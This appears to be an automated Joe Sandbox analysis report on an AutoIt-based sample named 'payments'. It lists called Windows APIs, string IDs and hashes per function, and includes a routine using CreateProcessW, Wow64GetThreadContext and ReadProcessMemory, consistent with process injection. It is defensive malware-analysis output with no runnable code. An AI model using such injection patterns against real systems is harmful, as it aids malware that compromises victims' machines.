                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1193 c949fb-c94a25 call c9bcce RegOpenKeyExW 1196 c94a2b-c94a2f 1193->1196 1197 d041cc-d041e3 RegQueryValueExW 1193->1197 1198 d041e5-d04222 call caf4ea call c947b7 RegQueryValueExW 1197->1198 1199 d04246-d0424f RegCloseKey 1197->1199 1204 d04224-d0423b call c96a63 1198->1204 1205 d0423d-d04245 call c947e2 1198->1205 1204->1205 1205->1199
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00C94A1D
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00D041DB
                                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00D0421A
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00D04249
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue$CloseOpen
                                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                          • API String ID: 1586453840-614718249
                                                                                                                          • Opcode ID: 41d6b9c3e3edbf25183d758ae5471c262405673143a91ef2412d82408ae20d51
                                                                                                                          • Instruction ID: 48a02b3be15dafd958ceda07c98873602a0615c8579f1a4cc45112c257b6f145
                                                                                                                          • Opcode Fuzzy Hash: 41d6b9c3e3edbf25183d758ae5471c262405673143a91ef2412d82408ae20d51
                                                                                                                          • Instruction Fuzzy Hash: F4113D71600219BEEB04EBA4DD8AEEF7BBDEF19344F004059B506D6191EB70AE06E760
                                                                                                                          Function 00C936B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1220 c936b8-c93728 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                          APIs
                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C936E6
                                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C93707
                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,00C93AA3,?), ref: 00C9371B
                                                                                                                          • ShowWindow.USER32(00000000,?,?,?,?,00C93AA3,?), ref: 00C93724
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$CreateShow
                                                                                                                          • String ID: AutoIt v3$edit
                                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                                          • Opcode ID: 8ff21b714144dbdd8934dc7e6978c9f548775eb882093ab7532c22cda7dd0256
                                                                                                                          • Instruction ID: 62463181b4f96f3f2aeff53afcf2946de78bf6f91a1289af824e8109a479b8e5
                                                                                                                          • Opcode Fuzzy Hash: 8ff21b714144dbdd8934dc7e6978c9f548775eb882093ab7532c22cda7dd0256
                                                                                                                          • Instruction Fuzzy Hash: 9CF0B7795403907AE721575BAC08F673E7EE7D6F65B00411ABE05E22E0C6650895DAB0
                                                                                                                          Function 00C92322 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 159COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C922A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C924F1), ref: 00C92303
                                                                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C925A1
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00C92618
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00D0503A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                                                                                          • String ID: (e$HA$xf
                                                                                                                          • API String ID: 3815369404-379937699
                                                                                                                          • Opcode ID: bc036831b413f0b8d4ef9883a65d330ec70cc8f67f597f7f29921f62ac417413
                                                                                                                          • Instruction ID: dbd0c83b61f532bac5c62fb53e2986533fb26ff07608362df684ee65a80719ce
                                                                                                                          • Opcode Fuzzy Hash: bc036831b413f0b8d4ef9883a65d330ec70cc8f67f597f7f29921f62ac417413
                                                                                                                          • Instruction Fuzzy Hash: E071D1BC9013819BCB04EF6AE896758BBA4F759346B80466EDD1AC7B71DB304804CF39
                                                                                                                          Function 010AD0F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 010ACFE0: Sleep.KERNELBASE(000001F4), ref: 010ACFF1
                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 010AD21D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1359173157.00000000010AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 010AA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10aa000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFileSleep
                                                                                                                          • String ID: 85RHLDAIO9WR624J5HD
                                                                                                                          • API String ID: 2694422964-824319245
                                                                                                                          • Opcode ID: 6a3c55228ce07b8a19c89776ce663e70443f65541c2ac03ed716913e8453cac0
                                                                                                                          • Instruction ID: 63dc302b35f415d9764e4775135e5393b72608236f19dce092d13b799c55bd52
                                                                                                                          • Opcode Fuzzy Hash: 6a3c55228ce07b8a19c89776ce663e70443f65541c2ac03ed716913e8453cac0
                                                                                                                          • Instruction Fuzzy Hash: 1651A270D0424DEBEF11DBE4C814BEEBBB9AF15300F404199E648BB2C1D6B95B45CBA5
                                                                                                                          Function 00C951AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00C9522F
                                                                                                                          • _wcscpy.LIBCMT ref: 00C95283
                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C95293
                                                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D03CB0
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                                                                          • String ID: Line:
                                                                                                                          • API String ID: 1053898822-1585850449
                                                                                                                          • Opcode ID: 93d4742d570b9dad0c80d85264981b820d1b04d8e176a235dffa297f5e7610d5
                                                                                                                          • Instruction ID: 3c3e29205e955db7740819044f2a954dcf382ff21d5b8da552406d7074e189f9
                                                                                                                          • Opcode Fuzzy Hash: 93d4742d570b9dad0c80d85264981b820d1b04d8e176a235dffa297f5e7610d5
                                                                                                                          • Instruction Fuzzy Hash: 5731DF75008740AFDB26EB60DC4AFDFB7D8AF44300F00451EF999921D1EB70A648DBA6
                                                                                                                          Function 00C94139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C941A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C939FE,?,00000001), ref: 00C941DB
                                                                                                                          • _free.LIBCMT ref: 00D036B7
                                                                                                                          • _free.LIBCMT ref: 00D036FE
                                                                                                                            • Part of subcall function 00C9C833: __wsplitpath.LIBCMT ref: 00C9C93E
                                                                                                                            • Part of subcall function 00C9C833: _wcscpy.LIBCMT ref: 00C9C953
                                                                                                                            • Part of subcall function 00C9C833: _wcscat.LIBCMT ref: 00C9C968
                                                                                                                            • Part of subcall function 00C9C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 00C9C978
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                          • API String ID: 805182592-1757145024
                                                                                                                          • Opcode ID: 0bad09b2914d134a4f5733f0752bd25ee47f57bec8a081aad551e19e33a64ab8
                                                                                                                          • Instruction ID: 06d789a607ec4479fb4001f49d7931f61a9506af7daec9230ae9a445bcffcafe
                                                                                                                          • Opcode Fuzzy Hash: 0bad09b2914d134a4f5733f0752bd25ee47f57bec8a081aad551e19e33a64ab8
                                                                                                                          • Instruction Fuzzy Hash: DA916F71910219AFCF04EFA4CC95AEDB7B8BF19314F54442AF81AAB291DB31DA05DB60
                                                                                                                          Function 00C94A30 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C95374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,,?,00C961FF,?,00000000,00000001,00000000), ref: 00C95392
                                                                                                                            • Part of subcall function 00C949FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00C94A1D
                                                                                                                          • _wcscat.LIBCMT ref: 00D02D80
                                                                                                                          • _wcscat.LIBCMT ref: 00D02DB5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcscat$FileModuleNameOpen
                                                                                                                          • String ID: \$\Include\
                                                                                                                          • API String ID: 3592542968-2640467822
                                                                                                                          • Opcode ID: c576ff1aa868cfc21a612a7d4bf7065f7f1bee3bf30496a1d22ed1c4a750dbb4
                                                                                                                          • Instruction ID: d13d2d60756f7f0404180b9fe17cfd447bd4d6603e0009995c19a6afcc58753a
                                                                                                                          • Opcode Fuzzy Hash: c576ff1aa868cfc21a612a7d4bf7065f7f1bee3bf30496a1d22ed1c4a750dbb4
                                                                                                                          • Instruction Fuzzy Hash: B5514D764057409BCB04EF65E995DABB7F4BB5A301B40452EFA49D33A0EB309A0CDB72
                                                                                                                          Function 00CB34AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __getstream.LIBCMT ref: 00CB34FE
                                                                                                                            • Part of subcall function 00CB7C0E: __getptd_noexit.LIBCMT ref: 00CB7C0E
                                                                                                                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00CB3539
                                                                                                                          • __wopenfile.LIBCMT ref: 00CB3549
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                          • String ID: <G
                                                                                                                          • API String ID: 1820251861-2138716496
                                                                                                                          • Opcode ID: 7ff692402a7029d137d3e64e845e9f008c132c092a2a10c64906f3c22dd06b01
                                                                                                                          • Instruction ID: d79d4bdf11ebb516def1880a2d7cc8fc218353e30c443062ace3396f978f8ac2
                                                                                                                          • Opcode Fuzzy Hash: 7ff692402a7029d137d3e64e845e9f008c132c092a2a10c64906f3c22dd06b01
                                                                                                                          • Instruction Fuzzy Hash: 16112971A002169FDB22BF758C426EF3AA4AF45750F148925F825DB281EB34CF05BBB1
                                                                                                                          Function 00CAD298 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00CAD28B,SwapMouseButtons,00000004,?), ref: 00CAD2BC
                                                                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00CAD28B,SwapMouseButtons,00000004,?,?,?,?,00CAC865), ref: 00CAD2DD
                                                                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,00CAD28B,SwapMouseButtons,00000004,?,?,?,?,00CAC865), ref: 00CAD2FF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                          • String ID: Control Panel\Mouse
                                                                                                                          • API String ID: 3677997916-824357125
                                                                                                                          • Opcode ID: 02e2e3c109de2a41fe0e30b426fc6a5a8f0a8bc144e72e6ecd4634198e359b89
                                                                                                                          • Instruction ID: a06bae20b6cb1bca4badd78bb125081915d3caf3512bd80116fade538bf71cfd
                                                                                                                          • Opcode Fuzzy Hash: 02e2e3c109de2a41fe0e30b426fc6a5a8f0a8bc144e72e6ecd4634198e359b89
                                                                                                                          • Instruction Fuzzy Hash: 35112A75612219BFDF108F64CC84EEE7BB8EF49748B108569B806D7220D7719E419B61
                                                                                                                          Function 010ABFE0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 010AC79B
                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 010AC831
                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 010AC853
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1359173157.00000000010AA000.00000040.00000020.00020000.00000000.sdmp, Offset: 010AA000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_10aa000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2438371351-0
                                                                                                                          • Opcode ID: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                                                          • Instruction ID: 30474ca09934a6313014697b9909ff0c8b1e45d3ecc96e32159622d932078536
                                                                                                                          • Opcode Fuzzy Hash: e3f14b9100784c2d13b4d96e4da997e342e741b63af52aad6d222721779d43e7
                                                                                                                          • Instruction Fuzzy Hash: 2A622B30A14258DBEB24CFA4C950BDEB772EF58300F5091A9D24DEB390E7769E81CB59
                                                                                                                          Function 00CDC396 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C94517: _fseek.LIBCMT ref: 00C9452F
                                                                                                                            • Part of subcall function 00CDC56D: _wcscmp.LIBCMT ref: 00CDC65D
                                                                                                                            • Part of subcall function 00CDC56D: _wcscmp.LIBCMT ref: 00CDC670
                                                                                                                          • _free.LIBCMT ref: 00CDC4DD
                                                                                                                          • _free.LIBCMT ref: 00CDC4E4
                                                                                                                          • _free.LIBCMT ref: 00CDC54F
                                                                                                                            • Part of subcall function 00CB1C9D: RtlFreeHeap.NTDLL(00000000,00000000,?,00CB7A85), ref: 00CB1CB1
                                                                                                                            • Part of subcall function 00CB1C9D: GetLastError.KERNEL32(00000000,?,00CB7A85), ref: 00CB1CC3
                                                                                                                          • _free.LIBCMT ref: 00CDC557
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1552873950-0
                                                                                                                          • Opcode ID: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                                                          • Instruction ID: 224195837234d490c16cd00e34b7caae5752d9657398533511e3efbd63e3299e
                                                                                                                          • Opcode Fuzzy Hash: 2db9d723d2f1f24614347a7e6fc8c80c315d14cd5ac174f49895e1fbecc6b5fc
                                                                                                                          • Instruction Fuzzy Hash: 04515BB1904219AFDF259F64DC81AAEBBB9EF48300F1040AEF619A3251DB715E80DF58
                                                                                                                          Function 00CAEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CAEBB2
                                                                                                                            • Part of subcall function 00C951AF: _memset.LIBCMT ref: 00C9522F
                                                                                                                            • Part of subcall function 00C951AF: _wcscpy.LIBCMT ref: 00C95283
                                                                                                                            • Part of subcall function 00C951AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C95293
                                                                                                                          • KillTimer.USER32(?,00000001,?,?), ref: 00CAEC07
                                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CAEC16
                                                                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D03C88
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1378193009-0
                                                                                                                          • Opcode ID: 087d87a30650bd70524224fdf5229a72581327256a0063f2cf7e065b66298a4b
                                                                                                                          • Instruction ID: c5f6af36217cb47920d0473a6c3281b0916f2d9ea6e79bebfafb28a7deaecfd9
                                                                                                                          • Opcode Fuzzy Hash: 087d87a30650bd70524224fdf5229a72581327256a0063f2cf7e065b66298a4b
                                                                                                                          • Instruction Fuzzy Hash: CF21D774504794AFF7339B288859BEBBBEC9B0231CF04048DE69E962C1C7746A84CB65
                                                                                                                          Function 00C940E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00D03725
                                                                                                                          • GetOpenFileNameW.COMDLG32 ref: 00D0376F
                                                                                                                            • Part of subcall function 00C9660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C953B1,?,?,00C961FF,?,00000000,00000001,00000000), ref: 00C9662F
                                                                                                                            • Part of subcall function 00C940A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C940C6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                                                                                          • String ID: X
                                                                                                                          • API String ID: 3777226403-3081909835
                                                                                                                          • Opcode ID: 450332b12807e056088a334e4070132c574577f85095f90cb396dade70a89b23
                                                                                                                          • Instruction ID: 9001ebd393e5fa4449c8c72247a6e2ae2539c73d55352c4dcac8ca06cdf90976
                                                                                                                          • Opcode Fuzzy Hash: 450332b12807e056088a334e4070132c574577f85095f90cb396dade70a89b23
                                                                                                                          • Instruction Fuzzy Hash: B921A571A10298ABCF05DF98C849BDEBBFD9F49304F108059E405E7281DBB49A8A9F65
                                                                                                                          Function 00CDC71A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00CDC72F
                                                                                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00CDC746
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Temp$FileNamePath
